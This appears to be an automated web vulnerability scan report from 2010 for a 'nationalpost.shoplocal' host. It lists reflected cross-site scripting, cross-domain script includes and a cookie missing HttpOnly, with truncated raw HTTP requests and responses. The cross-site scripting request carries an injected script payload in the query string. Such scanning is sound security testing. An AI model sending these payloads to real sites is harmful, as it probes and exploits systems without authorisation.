1. Cross-site scripting (reflected)
2. Cross-domain script include
3. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Certain |
Host: | http://nationalpost |
Path: | / |
GET /?ae686'-alert(1)- Host: nationalpost.shoplocal Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=Toronto Set-Cookie: Prefs=SLHPageCounter=1 P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 05:05:55 GMT Connection: close Content-Length: 36195 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmedi ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://nationalpost |
Path: | / |
GET / HTTP/1.1 Host: nationalpost.shoplocal Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=Toronto Set-Cookie: Prefs=SLHPageCounter=1 P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 05:05:50 GMT Connection: close Content-Length: 35949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... </script> <script type="text/javascript" src="http://ajax <script type="text/javascript" src="http://ajax ...[SNIP]... </script> <script language="javascript1.1" src="http://www.canada <script language="javascript1.1" src="http://www.canada ...[SNIP]... <!-- SiteCatalyst code version: H.2. Copyright 1997-2005 Omniture, Inc. More info available at http://www.omniture.com --> <script language="JavaScript" src="http://www.canada ...[SNIP]... <div style="position:relative <script type="text/javascript" src="http://www ...[SNIP]... </div> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://nationalpost |
Path: | / |
GET / HTTP/1.1 Host: nationalpost.shoplocal Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=Toronto Set-Cookie: Prefs=SLHPageCounter=1 P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 05:05:50 GMT Connection: close Content-Length: 35949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... |